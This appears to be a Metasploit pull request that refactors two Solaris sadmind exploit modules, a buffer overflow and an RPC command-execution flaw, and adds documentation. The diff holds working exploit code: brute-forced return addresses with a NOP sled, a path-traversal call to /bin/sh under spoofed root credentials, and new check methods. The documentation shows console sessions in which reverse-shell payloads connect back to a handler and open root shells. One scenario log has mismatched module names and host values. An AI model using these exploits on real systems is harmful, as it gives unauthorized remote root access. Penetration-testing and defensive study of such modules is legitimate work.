### PR TITLE
exploit/solaris/sunrpc/sadmind_*: Cleanup and add documentation

### DIFF
--- a/documentation/modules/exploit/solaris/sunrpc/sadmind_adm_build_path.md
+++ b/documentation/modules/exploit/solaris/sunrpc/sadmind_adm_build_path.md
@@ -1,0 +1,67 @@
+## Vulnerable Application
+
+This module exploits a buffer overflow vulnerability in `adm_build_path()`
+function of Sun Solstice AdminSuite sadmind daemon.
+
+The distributed system administration daemon (sadmind) is the daemon used by
+Solstice AdminSuite applications to perform distributed system administration
+operations.
+
+The sadmind daemon is started automatically by the inetd daemon whenever a
+request to invoke an operation is received. The sadmind daemon process
+continues to run for 15 minutes after the last request is completed, unless a
+different idle-time is specified with the -i command line option. The sadmind
+daemon may be started independently from the command line, for example, at
+system boot time. In this case, the -i option has no effect; sadmind continues
+to run, even if there are no active requests.
+
+This module has been successfully tested on:
+
+* Solaris 9u2 12/02 (x86);
+* Solaris 9u7 09/04 (x86);
+* Solaris 9u8 09/05 (x86).
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. Do: `use exploit/solaris/sunrpc/sadmind_adm_build_path`
+1. Do: `set rhosts [rhost]`
+1. Do: `exploit`
+1. You should get a new session as the `root` user.
+
+
+## Options
+
+
+## Scenarios
+
+### Solaris 9u2 12/02 s9x_u2wos_10 (x86)
+
+```
+msf6 > use exploit/solaris/sunrpc/sadmind_exec
+msf6 exploit(solaris/sunrpc/sadmind_exec) > set rhosts 192.168.200.155
+rhosts => 192.168.200.148
+msf6 exploit(solaris/sunrpc/sadmind_exec) > set payload generic/shell_reverse_tcp
+payload => generic/shell_reverse_tcp
+msf6 exploit(solaris/sunrpc/sadmind_exec) > run
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] 192.168.200.155:111 - Creating nop block...
+[*] 192.168.200.155:111 - Trying to exploit sadmind with address 0x08062030...
+[-] 192.168.200.155:111 - 192.168.200.155:111 - SunRPC - No response to SunRPC call for procedure: 1
+[*] 192.168.200.155:111 - Trying to exploit sadmind with address 0x08069830...
+[-] 192.168.200.155:111 - 192.168.200.155:111 - SunRPC - No response to SunRPC call for procedure: 1
+[*] 192.168.200.155:111 - Trying to exploit sadmind with address 0x08071030...
+[-] 192.168.200.155:111 - 192.168.200.155:111 - SunRPC - No response to SunRPC call for procedure: 1
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.155:32842) at 2025-04-21 08:18:47 -0400
+
+id
+uid=0(root) gid=0(root)
+uname -a
+SunOS unknown 5.9 Generic_112234-03 i86pc i386 i86pc
+cat /etc/release
+                         Solaris 9 12/02 s9x_u2wos_10 x86
+           Copyright 2002 Sun Microsystems, Inc.  All Rights Reserved.
+                        Use is subject to license terms.
+                           Assembled 05 November 2002
+```

--- a/documentation/modules/exploit/solaris/sunrpc/sadmind_exec.md
+++ b/documentation/modules/exploit/solaris/sunrpc/sadmind_exec.md
@@ -1,0 +1,72 @@
+## Vulnerable Application
+
+This exploit targets a weakness in the default security settings of
+the Sun Solstice AdminSuite distributed system administration daemon
+(sadmind) RPC application. This server is installed and enabled by
+default on most versions of the Solaris operating system.
+
+Vulnerable systems include Solaris 2.7, 8, and 9.
+
+This module has been successfully tested on:
+
+* Solaris 8 02/00 (x86);
+* Solaris 8u1 06/00 (x86);
+* Solaris 8u2 10/00 (x86);
+* Solaris 8u3 01/01 (x86);
+* Solaris 8u4 04/01 (x86);
+* Solaris 9u2 12/02 (x86).
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. Do: `use exploit/solaris/sunrpc/sadmind_exec`
+1. Do: `set rhosts [rhost]`
+1. Do: `exploit`
+1. You should get a new session as the `root` user.
+
+
+## Options
+
+### HOSTNAME
+
+Remote hostname. The hostname will be detected automatically by default;
+however, using the automatically detected hostname will fail if the system
+hostname was changed after the sadmind service was started.
+
+### GID
+
+GID to emulate (default: `0`)
+
+### UID
+
+UID to emulate (default: `0`)
+
+
+## Scenarios
+
+### Solaris 8u1 06/00 s28x_u1wos_08 INTEL (x86)
+
+```
+msf6 > use exploit/solaris/sunrpc/sadmind_exec
+msf6 exploit(solaris/sunrpc/sadmind_exec) > set rhosts 192.168.200.148
+rhosts => 192.168.200.148
+msf6 exploit(solaris/sunrpc/sadmind_exec) > set payload cmd/unix/reverse_perl
+payload => cmd/unix/reverse_perl
+msf6 exploit(solaris/sunrpc/sadmind_exec) > run
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] 192.168.200.148:111 - Attempting to determine hostname
+[*] 192.168.200.148:111 - Found hostname: unknown
+[*] 192.168.200.148:111 - Sending payload (234 bytes)
+[+] 192.168.200.148:111 - Exploit did not give us an error, this is good.
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.148:32810) at 2025-04-21 01:38:08 -0400
+
+id
+uid=0(root) gid=0(root)
+uname -a
+SunOS unknown 5.8 Generic_108529-01 i86pc i386 i86pc
+cat /etc/release
+                        Solaris 8 6/00 s28x_u1wos_08 INTEL
+           Copyright 2000 Sun Microsystems, Inc.  All Rights Reserved.
+                             Assembled 28 April 2000
+```

--- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
+++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
@@ -10,89 +10,99 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Brute
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Sun Solaris sadmind adm_build_path() Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Sun Solaris sadmind adm_build_path() Buffer Overflow',
+        'Description' => %q{
           This module exploits a buffer overflow vulnerability in adm_build_path()
-        function of sadmind daemon.
+          function of Sun Solstice AdminSuite sadmind daemon.
 
-        The distributed system administration daemon (sadmind) is the daemon used by
-        Solstice AdminSuite applications to perform distributed system administration
-        operations.
+          The distributed system administration daemon (sadmind) is the daemon used by
+          Solstice AdminSuite applications to perform distributed system administration
+          operations.
 
-        The sadmind daemon is started automatically by the inetd daemon whenever a
-        request to invoke an operation is received. The sadmind daemon process
-        continues to run for 15 minutes after the last request is completed, unless a
-        different idle-time is specified with the -i command line option. The sadmind
-        daemon may be started independently from the command line, for example, at
-        system boot time. In this case, the -i option has no effect; sadmind continues
-        to run, even if there are no active requests.
-      },
-      'Author'         =>
-        [
+          The sadmind daemon is started automatically by the inetd daemon whenever a
+          request to invoke an operation is received. The sadmind daemon process
+          continues to run for 15 minutes after the last request is completed, unless a
+          different idle-time is specified with the -i command line option. The sadmind
+          daemon may be started independently from the command line, for example, at
+          system boot time. In this case, the -i option has no effect; sadmind continues
+          to run, even if there are no active requests.
+        },
+        'Author' => [
           'Ramon de C Valle',
           'Adriano Lima <adriano[at]risesecurity.org>',
         ],
-      'Arch'           => ARCH_X86,
-      'Platform'       => 'solaris',
-      'References'     =>
-        [
+        'Arch' => ARCH_X86,
+        'Platform' => 'solaris',
+        'References' => [
           ['CVE', '2008-4556'],
           ['OSVDB', '49111'],
-          ['URL', 'http://risesecurity.org/advisories/RISE-2008001.txt'],
+          ['URL', 'https://web.archive.org/web/20081201000000*/https://risesecurity.org/advisories/RISE-2008001.txt'],
         ],
-      'Privileged'     => true,
-      'License'        => MSF_LICENSE,
-      'Payload'        =>
-        {
+        'Privileged' => true,
+        'License' => MSF_LICENSE,
+        'Payload' => {
           'Space' => 1024,
-          'BadChars' => "\x00",
+          'BadChars' => "\x00"
         },
-      'Targets'       =>
-        [
+        'Targets' => [
           [
             'Sun Solaris 9 x86 Brute Force',
             {
-              'Arch'       => [ ARCH_X86 ],
-              'Platform'   => 'solaris',
-              'Nops'       => 1024 * 32,
+              'Arch' => [ ARCH_X86 ],
+              'Platform' => 'solaris',
+              'Nops' => 1024 * 32,
               'Bruteforce' =>
                 {
                   'Start' => { 'Ret' => 0x08062030 },
-                  'Stop'  => { 'Ret' => 0x08072030 },
-                  'Step'  => 1024 * 30,
+                  'Stop' => { 'Ret' => 0x08072030 },
+                  'Step' => 1024 * 30
                 }
             }
           ],
           [
             'Sun Solaris 9 x86',
             {
-              'Nops'       => 1024 * 4,
+              'Nops' => 1024 * 4,
               'Bruteforce' =>
                 {
                   'Start' => { 'Ret' => 0x08066a60 + 2048 },
-                  'Stop'  => { 'Ret' => 0x08066a60 + 2048 },
-                  'Step'  => 1,
+                  'Stop' => { 'Ret' => 0x08066a60 + 2048 },
+                  'Step' => 1
                 }
             }
           ],
           [
             'Debug',
             {
-              'Nops'       => 1024 * 4,
+              'Nops' => 1024 * 4,
               'Bruteforce' =>
                 {
                   'Start' => { 'Ret' => 0xaabbccdd },
-                  'Stop'  => { 'Ret' => 0xaabbccdd },
-                  'Step'  => 1,
+                  'Stop' => { 'Ret' => 0xaabbccdd },
+                  'Step' => 1
                 }
             }
           ],
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2008-10-14'
-    ))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2008-10-14',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
 
+  def check
+    port = sunrpc_create('udp', 100232, 10)
+    port.nil? ? CheckCode::Safe : CheckCode::Detected
+  ensure
+    sunrpc_destroy unless rpcobj.nil?
   end
 
   def brute_exploit(brute_target)
@@ -112,19 +122,20 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    print_status("Trying to exploit sadmind with address 0x%.8x..." % brute_target['Ret'])
+    print_status('Trying to exploit sadmind with address 0x%.8x...' % brute_target['Ret'])
 
     hostname = 'localhost'
 
     # buf1 = rand_text_alpha(1017) + [brute_target['Ret']].pack('L')
-    buf1 = "A" * 1017 + [brute_target['Ret']].pack('L')
+    buf1 = 'A' * 1017 + [brute_target['Ret']].pack('L')
     buf2 = @nops + payload.encoded
 
-    header =
-      Rex::Encoder::XDR.encode(0) * 7 +
-      Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
-        4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
-        hostname, 'system', rand_text_alpha(16))
+    header = Rex::Encoder::XDR.encode(0) * 7
+    header << Rex::Encoder::XDR.encode(
+      6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
+      4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
+      hostname, 'system', rand_text_alpha(16)
+    )
 
     body =
       do_int('ADM_FW_VERSION', 1) +
@@ -151,9 +162,8 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::Proto::SunRPC::RPCError => e
       print_error(e.to_s)
     end
-
-    sunrpc_destroy
-    handler
+  ensure
+    sunrpc_destroy unless rpcobj.nil?
   end
 
   def do_string(str1, str2)

--- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb
+++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb
@@ -9,51 +9,66 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::SunRPC
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Solaris sadmind Command Execution',
-      'Description'    => %q{
-          This exploit targets a weakness in the default security
-        settings of the sadmind RPC application. This server is
-        installed and enabled by default on most versions of the
-        Solaris operating system.
+    super(
+      update_info(
+        info,
+        'Name' => 'Solaris sadmind Command Execution',
+        'Description' => %q{
+          This exploit targets a weakness in the default security settings of
+          the Sun Solstice AdminSuite distributed system administration daemon
+          (sadmind) RPC application. This server is installed and enabled by
+          default on most versions of the Solaris operating system.
 
-        Vulnerable systems include solaris 2.7, 8, and 9
-      },
-      'Author'         => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          Vulnerable systems include Solaris 2.7, 8, and 9.
+        },
+        'Author' => [
+          'vlad902 <vlad902[at]gmail.com>',
+          'hdm',
+          'cazz',
+          'midnitesnake'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
           ['CVE', '2003-0722'],
           ['OSVDB', '4585'],
           ['BID', '8615']
         ],
-      'Privileged'     => true,
-      'Platform'       => %w{ solaris unix },
-      'Arch'           => ARCH_CMD,
-      'Payload'        =>
-        {
-          'Space'       => 2000,
-          'BadChars'    => "\x00",
+        'Privileged' => true,
+        'Platform' => %w[solaris unix],
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Space' => 2000,
+          'BadChars' => "\x00",
           'DisableNops' => true,
           'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl telnet',
-            }
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic perl telnet ksh'
+          }
         },
-      'Targets'        => [ ['Automatic', { }], ],
-      'DisclosureDate' => '2003-09-13',
-      'DefaultTarget' => 0
-    ))
-
-    register_options(
-      [
-        OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
-        OptInt.new('GID', [false, 'GID to emulate', 0]),
-        OptInt.new('UID', [false, 'UID to emulate', 0])
-      ], self.class
+        'Targets' => [ ['Automatic', {}], ],
+        'DisclosureDate' => '2003-09-13',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
     )
+
+    register_options([
+      OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
+      OptInt.new('GID', [false, 'GID to emulate', 0]),
+      OptInt.new('UID', [false, 'UID to emulate', 0])
+    ])
+  end
+
+  def check
+    port = sunrpc_create('udp', 100232, 10)
+    port.nil? ? CheckCode::Safe : CheckCode::Detected
+  ensure
+    sunrpc_destroy unless rpcobj.nil?
   end
 
   def exploit
@@ -61,46 +76,45 @@ class MetasploitModule < Msf::Exploit::Remote
     sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])
 
     if !datastore['HOSTNAME']
-      print_status('attempting to determine hostname')
-      response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")
+      print_status('Attempting to determine hostname')
+      response = sadmind_request(rand_text_alpha(rand(1..10)), 'true')
 
-      if !response
-        print_error('no response')
-        return
+      unless response
+        fail_with(Failure::Unreachable, 'No response')
       end
 
       match = /Security exception on host (.*)\.  USER/.match(response)
-      if match
-        hostname = match.captures[0]
-        print_status("found hostname: #{hostname}")
-      else
-        print_error('unable to determine hostname')
-        return
+      unless match
+        fail_with(Failure::Unknown, 'Unable to determine hostname')
       end
+
+      hostname = match.captures[0]
+      print_status("Found hostname: #{hostname}")
     else
       hostname = datastore['HOSTNAME']
     end
 
     sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
+    print_status("Sending payload (#{payload.encoded.length} bytes) ...")
     response = sadmind_request(hostname, payload.encoded)
-    sunrpc_destroy
 
     if /Security exception on host/.match(response)
-      print_error('exploit failed')
-      return
-    else
-      print_status('exploit did not give us an error, this is good...')
-      select(nil,nil,nil,1)
-      handler
+      fail_with(Failure::Unknown, "Security exception for hostname '#{hostname}' (UID #{datastore['UID']} and GID #{datastore['GID']}).")
     end
+
+    print_good('Exploit did not give us an error, this is good.')
+    select(nil, nil, nil, 1)
+  ensure
+    sunrpc_destroy unless rpcobj.nil?
   end
 
   def sadmind_request(host, command)
-    header =
-      Rex::Encoder::XDR.encode(0) * 7 +
-      Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
-        4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
-        host, 'system', '../../../bin/sh')
+    header = Rex::Encoder::XDR.encode(0) * 7
+    header << Rex::Encoder::XDR.encode(
+      6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
+      4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
+      host, 'system', '../../../bin/sh'
+    )
 
     body =
       do_int('ADM_FW_VERSION', 1) +


### PR DESCRIPTION
* Fix broken reference URLs
* Resolve RuboCop violations
* Add module documentation
* Add `check` method
* Add `Notes` to module init hash
* Add `ksh` as an `ARCH_CMD` compatible payload command
* Replace `print_*(msg); return` code pattern with `fail_with`

Updates two modules:

* modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
* modules/exploits/solaris/sunrpc/sadmind_exec.rb
